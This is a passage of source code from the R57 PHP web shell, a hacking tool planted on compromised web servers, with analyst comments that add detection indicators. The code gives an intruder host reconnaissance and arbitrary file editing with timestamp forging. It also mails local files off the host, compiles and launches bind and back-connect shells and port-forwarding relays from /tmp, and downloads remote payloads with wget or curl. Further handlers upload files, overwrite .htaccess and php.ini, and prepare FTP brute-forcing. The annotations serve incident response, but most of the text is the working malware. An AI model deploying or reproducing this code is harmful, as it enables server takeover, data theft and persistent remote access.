  3398. style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px">
  3399. <SPAN
  3400. style="FONT-SIZE: 20pt; COLOR: red; FONT-FAMILY: Impact">R57 ver 1.5</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
  3401. echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
  3402. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."? title=\"".$lang[$language.'_text46']."\"><b>The main survey</b></a> ".$rb;
  3403. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?sqlman title=\"".$lang[$language.'_text46']."\"><b>SQL</b></a> ".$rb;
  3404. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
  3405. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
  3406. if($unix)
  3407.  {
  3408.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
  3409.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
  3410.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
  3411.  }
  3412. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
  3413. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
  // Analyst note: environment report. Prints safe_mode, the PHP version, whether cURL
  // and four database client extensions (MySQL, MSSQL, PostgreSQL, Oracle) are
  // loaded, the disable_functions list, free/total disk space for $dir, and the
  // register_globals and open_basedir settings. Note the colour coding: a set
  // open_basedir is shown red and an unset one green, and an empty disable_functions
  // is shown as "NONE". $dir, ws() and view_size() are defined elsewhere.
  // Hardening: the settings this panel reports on (disable_functions, open_basedir)
  // are the ones worth verifying on a PHP host.
  3414. echo ws(2)."safe_mode: <b>";
  3415. echo (($safe_mode)?("<font color=#008000>ON</font>"):("<font color=red>OFF</font>"));
  3416. echo "</b>".ws(2);
  3417. echo "PHP version: <b>".@phpversion()."</b>";
  3418. $curl_on = @function_exists('curl_version');
  3419. echo ws(2);
  3420. echo "cURL: <b>".(($curl_on)?("<font color=#008000>ON</font>"):("<font color=red>OFF</font>"));
  3421. echo "</b>".ws(2);
  3422. echo "MYSQL: <b>";
  3423. $mysql_on = @function_exists('mysql_connect');
  3424. if($mysql_on){
  3425. echo "<font color=#008000>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
  3426. echo "</b>".ws(2);
  3427. echo "MSSQL: <b>";
  3428. $mssql_on = @function_exists('mssql_connect');
  3429. if($mssql_on){echo "<font color=#008000>ON</font>";}else{echo "<font color=red>OFF</font>";}
  3430. echo "</b>".ws(2);
  3431. echo "PostgreSQL: <b>";
  3432. $pg_on = @function_exists('pg_connect');
  3433. if($pg_on){echo "<font color=#008000>ON</font>";}else{echo "<font color=red>OFF</font>";}
  3434. echo "</b>".ws(2);
  3435. echo "Oracle: <b>";
  3436. $ora_on = @function_exists('ocilogon');
  3437. if($ora_on){echo "<font color=#008000>ON</font>";}else{echo "<font color=red>OFF</font>";}
  3438. echo "</b><br>".ws(2);
  3439. echo "Disable functions: <b>";
  3440. if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
  3441. $free = @diskfreespace($dir);
  3442. if (!$free) {$free = 0;}
  3443. $all = @disk_total_space($dir);
  3444. if (!$all) {$all = 0;}
  3445. echo "<br>".ws(2)."HDD Free  : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
  3446. echo "</b><br>".ws(2);
  3447. echo "Register globals: <b>";
  3448. $reg_g = @ini_get("register_globals");
  3449. if($reg_g){
  3450. echo "<font color=#008000>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
  3451. echo "</b>".ws(2);
  3452. echo "open_basedir: <b>";
  3453. $openbasedi = @ini_get("open_basedir");
  3454. if($openbasedi){
  3455. echo "<font color=red>ON</font>"; } else { echo "<font color=#008000>OFF</font>"; }
  3456. echo "</b>".ws(2);
  // Analyst note: host identity table. On the $unix branch the page prints the labels
  // "uname -a :", "sysctl :", "$OSTYPE :", "Server :", "id :", "pwd :" and "ip :"
  // followed by the values; the other branch prints OS, Server, User, pwd and ip.
  // $uname, $id and $sysctl may have been taken from request cookies earlier in the
  // file and are echoed here without escaping. $SERVER_SOFTWARE is read as a bare
  // global, which presumably depends on register_globals -- confirm against the rest
  // of the file. Both branches also print REMOTE_ADDR and the address that HTTP_HOST
  // resolves to.
  // Detection: this label sequence in an HTTP response body is a usable content
  // signature for response inspection.
  3457. echo '</font></td></tr><table>
  3458. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc>
  3459. <tr><td align=right width=100>';
  3460. echo $font;
  3461. if($unix){
  3462. echo '<font color=#990000><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
  3463. echo "</td><td>";
  3464. echo "<font face=tahoma size=-2 color=#cccccc><b>";
  3465. echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
  3466. echo ws(3).$sysctl."<br>";
  3467. echo ws(3).ex('echo $OSTYPE')."<br>";
  3468. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  3469. if(!empty($id)) { echo ws(3).$id."<br>"; }
  3470. else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
  3471.  {
  3472.  $euserinfo  = @posix_getpwuid(@posix_geteuid());
  3473.  $egroupinfo = @posix_getgrgid(@posix_getegid());
  3474.  echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
  3475.  }
  3476. else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
  3477. echo ws(3).$dir;
  3478. echo ws(3).'( '.perms(@fileperms($dir)).' )';
  3479. echo "<br>";
  3480. echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  3481. echo "</b></font>";
  3482. }
  3483. else
  3484. {
  3485. echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
  3486. echo "</td><td>";
  3487. echo "<font face=tahoma size=-2 color=red><b>";
  3488. echo ws(3).@substr(@php_uname(),0,120)."<br>";
  3489. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  3490. echo ws(3).@getenv("USERNAME")."<br>";
  3491. echo ws(3).$dir;
  3492. echo "<br>";
  3493. echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
  3494. echo "<br></font>";
  3495. }
  3496. echo "</font>";
  3497. echo "</td></tr></table>";
  // Handler for cmd=mail: hands the POSTed to/subj/text values to mail() and
  // concatenates the POSTed `from` into the header string. Nothing is validated
  // in this block, so the request controls the whole message.
  // NOTE(review): err() is defined elsewhere; 6+$res presumably selects a
  // failure/success message - confirm. Outbound mail originating from the web
  // server's PHP process may show up in MTA logs during triage.
  3498. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
  3499.  {
  3500.  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
  3501.  err(6+$res);
  3502.  $_POST['cmd']="";
  3503.  }
  // Handler for cmd=mail_file: opens the path given in POST loc_file, reads the
  // whole file and mails it as an attachment, i.e. it moves a local file off
  // the host by e-mail.
  // NOTE(review): compress() and mailattach() are defined elsewhere; compress()
  // presumably updates $filename/$filedump/$mime_type through globals or
  // references - confirm.
  // The two fallback strings below ('file from ly0kha shell' and
  // 'billy@microsoft.com') are fixed values that can be searched for in mail
  // logs when the request did not override them.
  3504. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
  3505.  {
  3506.  if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
  3507.  else
  3508.   {
  3509.     $filename = @basename($_POST['loc_file']);
  3510.     $filedump = @fread($file,@filesize($_POST['loc_file']));
  3511.     fclose($file);
  3512.     $content_encoding=$mime_type='';
  3513.     compress($filename,$filedump,$_POST['compress']);
  3514.     $attach = array(
  3515.                     "name"=>$filename,
  3516.                     "type"=>$mime_type,
  3517.                     "content"=>$filedump
  3518.                    );
  3519.     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from ly0kha shell'; }
  3520.     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
  3521.     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
  3522.     err(6+$res);
  3523.     $_POST['cmd']="";
  3524.   }
  3525.  }
  // Handler for cmd=find_text: replaces cmd with a find | xargs grep pipeline
  // assembled from three POST fields (s_dir, s_mask, s_text). The fields are
  // concatenated as-is; the resulting string is executed later in the page by
  // the generic ex($_POST['cmd']) call.
  // For responders: find/xargs/grep started as children of the PHP process is
  // what this handler looks like in process telemetry.
  3526. if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
  3527. {
  3528. $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
  3529. }
  // Handler for cmd=ch_: changes owner, group or mode of the path in POST
  // param1 according to POST `what`. param2 is the new owner/group, or the mode
  // parsed as an octal number. Errors are suppressed with @ and nothing is
  // reported back, so a failed or successful change leaves no trace in the page
  // output; file-integrity or audit tooling is the place to look for it.
  3530. if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
  3531.  {
  3532.  switch($_POST['what'])
  3533.    {
  3534.    case 'own':
  3535.    @chown($_POST['param1'],$_POST['param2']);
  3536.    break;
  3537.    case 'grp':
  3538.    @chgrp($_POST['param1'],$_POST['param2']);
  3539.    break;
  3540.    case 'mod':
  3541.    @chmod($_POST['param1'],intval($_POST['param2'], 8));
  3542.    break;
  3543.    }
  3544.  $_POST['cmd']="";
  3545.  }
  // Handler for cmd=mk: creates or deletes a file or directory named by POST
  // mk_name, selected by POST `what` (file/dir) and POST `action`
  // (create/delete). The path is used exactly as received.
  // After a successful file create, cmd is switched to "edit_file" and e_name
  // is set, so the edit handler that follows in the page opens the new file.
  // NOTE(review): err() and the $lang[...] message table are defined elsewhere.
  3546. if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
  3547.  {
  3548.    switch($_POST['what'])
  3549.    {
  3550.      case 'file':
  3551.       if($_POST['action'] == "create")
  3552.        {
  3553.        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  3554.        else {
  3555.         fclose($file);
  3556.         $_POST['e_name'] = $_POST['mk_name'];
  3557.         $_POST['cmd']="edit_file";
  3558.         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
  3559.         }
  3560.        }
  3561.        else if($_POST['action'] == "delete")
  3562.        {
  3563.        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
  3564.        $_POST['cmd']="";
  3565.        }
  3566.      break;
  3567.      case 'dir':
  3568.       if($_POST['action'] == "create"){
  3569.       if(mkdir($_POST['mk_name']))
  3570.        {
  3571.          $_POST['cmd']="";
  3572.          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
  3573.        }
  3574.       else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  3575.       }
  3576.       else if($_POST['action'] == "delete"){
  3577.       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
  3578.       $_POST['cmd']="";
  3579.       }
  3580.      break;
  3581.    }
  3582.  }
  // Handler for cmd=edit_file: renders an HTML form containing the contents of
  // the file named in POST e_name, then ends the request with exit().
  // The first fopen ("r+") only probes writability and sets $only_read on
  // failure; the second fopen ("r") is the one actually read from.
  // File contents are passed through htmlspecialchars(), but e_name and $dir
  // are written into the page unescaped.
  // The form posts back with cmd=save_file, which the next handler processes.
  3583. if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
  3584.  {
  3585.  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
  3586.  if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
  3587.  else {
  3588.  echo $table_up3;
  3589.  echo $font;
  3590.  echo "<form name=save_file method=post>";
  3591.  echo ws(3)."<b>".$_POST['e_name']."</b>";
  3592.  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
  3593.  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
  3594.  fclose($file);
  3595.  echo "</textarea>";
  3596.  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
  3597.  echo "<input type=hidden name=dir value=".$dir.">";
  3598.  echo "<input type=hidden name=cmd value=save_file>";
  3599.  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
  3600.  echo "</div>";
  3601.  echo "</font>";
  3602.  echo "</form>";
  3603.  echo "</td></tr></table>";
  3604.  exit();
  3605.  }
  3606.  }
  // Handler for cmd=save_file: overwrites the file named in POST e_name with
  // POST e_text (CRLF converted to LF when $unix is set).
  // The modification time is read before the write and put back afterwards
  // with touch($name, $mtime, $mtime), which sets both mtime and atime to the
  // pre-edit value. For responders: the mtime/atime of a file edited through
  // this handler does not reflect the edit, so timeline work has to rely on
  // other evidence (e.g. inode change time, web access logs, integrity
  // baselines).
  3607. if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
  3608.  {
  3609.  $mtime = @filemtime($_POST['e_name']);
  3610.  if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
  3611.  else {
  3612.  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
  3613.  @fwrite($file,$_POST['e_text']);
  3614.  @touch($_POST['e_name'],$mtime,$mtime);
  3615.  $_POST['cmd']="";
  3616.  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
  3617.  }
  3618.  }
  3619.  
  3620.  
  3621.  
  // Port-binding listener, C variant (POST port + bind_pass, use=="C").
  // NOTE(review): cf() and ex() are defined elsewhere; presumably cf() writes
  // the second argument to the named file and ex() runs a shell command -
  // confirm.
  // Sequence visible here: source written to /tmp/bd.c, compiled with gcc to
  // /tmp/bd, source deleted, binary started in the background with the POSTed
  // port and password as arguments.
  // Host indicators: gcc launched by the PHP/web-server account, an executable
  // at /tmp/bd, and a listening socket owned by that account.
  // The first assignment to cmd is overwritten by the second.
  3622. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
  3623. {
  3624.  cf("/tmp/bd.c",$port_bind_bd_c);
  3625.  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
  3626.  @unlink("/tmp/bd.c");
  3627.  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
  3628.  $_POST['cmd']="ps -aux | grep bd";
  3629. $_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
  3630.  
  3631. }
  // Second listener variant, keyed on POST port1.
  // NOTE(review): cf() and ex() are defined elsewhere; presumably "write file"
  // and "run shell command" - confirm.
  // The else branch is taken whenever port1 is empty, i.e. on every request
  // that did not ask for this feature, and it still calls
  // cf("/tmp/bds", ...). If cf() writes the file as assumed, the presence of
  // /tmp/bds on a host indicates that this page has been requested at all.
  // The if branch uses the relative names "bds" / "./bds" in the current
  // working directory instead.
  3632. if (!empty($_POST['port1']))
  3633. {
  3634.  cf("bds",$port_bind_bd_cs);
  3635.  $blah = ex("chmod 777 bds");
  3636.  $blah = ex("./bds ".$_POST['port1']." &");
  3637.  $_POST['cmd']="echo \"Now script install backdoor connect to port ";
  3638.   }else{
  3639. cf("/tmp/bds",$port_bind_bd_cs);
  3640.  $blah = ex("chmod 777 bds");
  3641.  $blah = ex("./tmp/bds ".$_POST['port1']." &");
  3642.  }
  // When POST php_ini1 is set, passes the relative name "php.ini" and the
  // $php_ini1 payload (defined elsewhere) to cf().
  // NOTE(review): cf() presumably writes the file into the current working
  // directory - confirm. An unexpected php.ini inside a web-served directory
  // is worth checking against the deployed baseline.
  // The cmd string below is mis-encoded in this copy of the file.
  3643. if (!empty($_POST['php_ini1']))
  3644. {
  3645.  cf("php.ini",$php_ini1);
  3646.   $_POST['cmd']=" ?????? ????? ??? php.ini ?? ??? ???";
  3647.  }
  3648.  
  // When POST htacces is set, passes the relative name ".htaccess" and the
  // $htacces payload (defined elsewhere) to cf().
  // NOTE(review): cf() presumably writes/overwrites the file in the current
  // working directory - confirm. A new or modified .htaccess next to this
  // script should be diffed against the deployed version.
  3649.  if (!empty($_POST['htacces']))
  3650. {
  3651.  cf(".htaccess",$htacces);
  3652.   $_POST['cmd']="To stop manufacturing Skjorti htaccess Been laying file";
  3653.  }
  // When POST file_ini is set, passes the relative name "ini.php" and the
  // $sni_res payload (defined elsewhere) to cf().
  // NOTE(review): cf() presumably writes the file into the current working
  // directory - confirm. The cmd text below refers to an `ss` request
  // parameter of ini.php, so requests to an ini.php carrying `ss=` are a
  // web-log pattern associated with this feature.
  3654.   if (!empty($_POST['file_ini']))
  3655. {
  3656.  cf("ini.php",$sni_res);
  3657.  
  3658.   $_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt?Read ss variable ini.php Error! Can't write in file";
  3659.  }
  3660.  
  // Copies the content read from POST filefrom into the path POST fileto and
  // prints the resulting size in KiB.
  // The guard uses ||, so the body runs when either field is non-empty; the
  // other one may be missing. Return values of file() and fopen() are not
  // checked.
  // NOTE(review): file() accepts stream wrappers, so filefrom is presumably
  // also used with remote URLs where the PHP configuration allows it - confirm
  // against the form that posts here.
  3661. if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))
  3662.  
  3663. {
  3664. $data = implode("", file($_POST['filefrom']));
  3665. $fp = fopen($_POST['fileto'], "wb");
  3666. fputs($fp, $data);
  3667. $ok = fclose($fp);
  3668. if($ok)
  3669. {
  3670. $size = filesize($_POST['fileto'])/1024;
  3671. $sizef = sprintf("%.2f", $size);
  3672. print "<center><div id=logostrip>Download - OK.
  3673. (".$sizef."ê?)</div></center>";
  3674. }
  3675. else
  3676. {
  3677. print "<center><div id=logostrip>Something is wrong. Download - IS NOT
  3678. OK</div></center>";
  3679. }
  3680. }
  // Port-binding listener, Perl variant (POST port + bind_pass, use=="Perl").
  // NOTE(review): cf(), which() and ex() are defined elsewhere; presumably
  // "write file", "locate binary" and "run shell command" - confirm.
  // Host indicators: a script at /tmp/bdpl and a perl process running it under
  // the PHP/web-server account. The script file is not removed afterwards.
  // The first assignment to cmd is overwritten by the second.
  3681. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
  3682. {
  3683.  cf("/tmp/bdpl",$port_bind_bd_pl);
  3684.  $p2=which("perl");
  3685.  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
  3686.  $_POST['cmd']="ps -aux | grep bdpl";
  3687.  $_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
  3688. }
  // Outbound ("back-connect") variant in Perl (POST ip + port, use=="Perl").
  // NOTE(review): cf(), which() and ex() are defined elsewhere - see their
  // definitions for exact behaviour.
  // Host/network indicators: a script at /tmp/back, a perl process running it
  // under the PHP/web-server account, and an outbound connection from that
  // process to the POSTed address and port.
  3689. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
  3690. {
  3691.  cf("/tmp/back",$back_connect);
  3692.  $p2=which("perl");
  3693.  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
  3694.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...Datached\"";
  3695. }
  // Second outbound variant, keyed on POST ips + ports (no `use` check).
  // NOTE(review): cf(), which() and ex() are defined elsewhere - see their
  // definitions for exact behaviour.
  // Host/network indicators: a script at /tmp/backs, a perl process running it
  // under the PHP/web-server account, and an outbound connection to the POSTed
  // address and port.
  3696. if (!empty($_POST['ips']) && !empty($_POST['ports']))
  3697. {
  3698.  cf("/tmp/backs",$back_connects);
  3699.  $p2=which("perl");
  3700.  $blah = ex($p2." /tmp/backs ".$_POST['ips']." ".$_POST['ports']." &");
  3701.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ips']." port ".$_POST['ports']." ...\"";
  3702.  
  3703. }
  // Outbound ("back-connect") variant in C (POST ip + port, use=="C").
  // NOTE(review): cf() and ex() are defined elsewhere - see their definitions
  // for exact behaviour.
  // Sequence visible here: source written to /tmp/back.c, compiled with gcc to
  // /tmp/backc, source deleted, binary started in the background.
  // Host/network indicators: gcc launched by the PHP/web-server account, an
  // executable at /tmp/backc, and an outbound connection from it.
  3704. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
  3705. {
  3706.  cf("/tmp/back.c",$back_connect_c);
  3707.  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
  3708.  @unlink("/tmp/back.c");
  3709.  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
  3710.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
  3711. }
  // Port-forwarding ("datapipe") helper, Perl variant: POST local_port,
  // remote_host and remote_port are passed as arguments to the script.
  // NOTE(review): cf(), which() and ex() are defined elsewhere - see their
  // definitions for exact behaviour.
  // Host indicators: a script at /tmp/dp and a perl process running it under
  // the PHP/web-server account, holding a listening socket and relayed
  // connections.
  3712. if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
  3713. {
  3714.  cf("/tmp/dp",$datapipe_pl);
  3715.  $p2=which("perl");
  3716.  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
  3717.  $_POST['cmd']="ps -aux | grep dp";
  3718. }
  // Port-forwarding ("datapipe") helper, C variant. Note the argument order
  // differs from the Perl variant: local_port, remote_port, remote_host.
  // NOTE(review): cf() and ex() are defined elsewhere - see their definitions
  // for exact behaviour.
  // Sequence visible here: source written to /tmp/dpc.c, compiled with gcc to
  // /tmp/dpc, source deleted, binary started in the background.
  // Host indicators: gcc launched by the PHP/web-server account and an
  // executable at /tmp/dpc.
  3719. if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
  3720. {
  3721.  cf("/tmp/dpc.c",$datapipe_c);
  3722.  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
  3723.  @unlink("/tmp/dpc.c");
  3724.  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
  3725.  $_POST['cmd']="ps -aux | grep dpc";
  3726. }
  // Replaces cmd with a predefined command string when POST alias names an
  // entry of $aliases (table defined elsewhere in the file).
  3727. if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
  // File upload: copies the uploaded temp file to POST dir + "/" + a name that
  // is either POST new_name or the client-supplied file name. Neither the
  // directory nor the name is checked, so the destination is fully
  // request-controlled.
  // Uses the legacy $HTTP_POST_FILES array and copy() rather than
  // move_uploaded_file().
  // For responders: multipart POSTs to this script in the access log line up
  // with files appearing under the posted directory.
  3728. if (!empty($HTTP_POST_FILES['userfile']['name']))
  3729. {
  3730. if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
  3731. else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
  3732. @copy($HTTP_POST_FILES['userfile']['tmp_name'],
  3733.             $_POST['dir']."/".$nfn)
  3734.       or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
  3735. }
  // Remote-file fetch: builds a command line for one of six download tools
  // (wget, fetch, lynx, links, GET, curl) from POST rem_file and POST loc_file
  // and stores it in cmd for later execution by the generic ex() call.
  // Both values are concatenated into the command string unquoted.
  // The case labels are bare words, not quoted strings, which relies on legacy
  // PHP treating undefined constants as strings.
  // NOTE(review): which() is defined elsewhere; presumably resolves the tool's
  // path - confirm.
  // For responders: any of these tools started as a child of the PHP process
  // is the process-level trace of this feature.
  3736. if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
  3737. {
  3738.  switch($_POST['with'])
  3739.  {
  3740.  case wget:
  3741.  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
  3742.  break;
  3743.  case fetch:
  3744.  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
  3745.  break;
  3746.  case lynx:
  3747.  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  3748.  break;
  3749.  case links:
  3750.  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  3751.  break;
  3752.  case GET:
  3753.  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  3754.  break;
  3755.  case curl:
  3756.  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
  3757.  break;
  3758.  }
  3759. }
  // Handler for cmd=ftp_file_up / ftp_file_down: connects to the FTP server in
  // POST ftp_server_port ("host:port", port defaults to 21, 10 s timeout), logs
  // in with the POSTed credentials and transfers one file in the POSTed mode.
  // For a download whose local target equals $dir, the remote file's basename
  // is appended to $dir.
  // Transfer errors are suppressed with @; only connect/login failures reach
  // err(). Uses split(), which exists only in legacy PHP.
  // For responders: outbound FTP control/data connections from the web server
  // are the network trace of this handler.
  3760. if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
  3761.  {
  3762.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  3763.  if(empty($ftp_port)) { $ftp_port = 21; }
  3764.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  3765.  if(!$connection) { err(3); }
  3766.  else
  3767.   {
  3768.   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
  3769.   else
  3770.    {
  3771.    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
  3772.    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
  3773.    }
  3774.   }
  3775.  @ftp_close($connection);
  3776.  $_POST['cmd'] = "";
  3777.  }
  3778.  
  // Pre-check for cmd=ftp_brute: verifies that the FTP server in POST
  // ftp_server_port is reachable and that get_users() returns a non-empty
  // result, then closes the connection. cmd is cleared only when one of the
  // two checks fails; otherwise it stays "ftp_brute" for code later in the
  // file.
  // NOTE(review): get_users() is defined elsewhere; presumably it returns
  // local account names - confirm. No login attempt is made in this block.
  // For responders: the feature name implies many failed FTP logins in the
  // target server's auth log, originating from this web host.
  3779. if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
  3780.  {
  3781.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  3782.  if(empty($ftp_port)) { $ftp_port = 21; }
  3783.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  3784.  if(!$connection) { err(3); $_POST['cmd'] = ""; }
